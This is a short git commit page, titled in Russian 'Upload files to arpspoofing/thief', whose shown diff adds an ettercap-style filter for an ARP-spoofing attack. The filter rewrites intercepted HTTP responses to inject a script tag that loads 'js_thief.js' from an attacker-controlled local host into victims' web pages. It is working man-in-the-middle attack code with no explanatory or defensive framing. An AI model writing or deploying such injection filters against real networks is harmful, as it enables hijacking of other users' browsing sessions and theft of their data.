Загрузить файлы в «arpspoofing/thief»

This commit is contained in:
2026-03-29 19:29:31 +00:00
parent f46cd4ff33
commit eda5a023c2
3 changed files with 35 additions and 0 deletions

View File

@@ -0,0 +1,3 @@
if (ip.proto == TCP && tcp.src == 80) {
replace(/<\/head>/i, '<script src="http://192.168.1.116:8000/js_thief.js"></script></head>');
}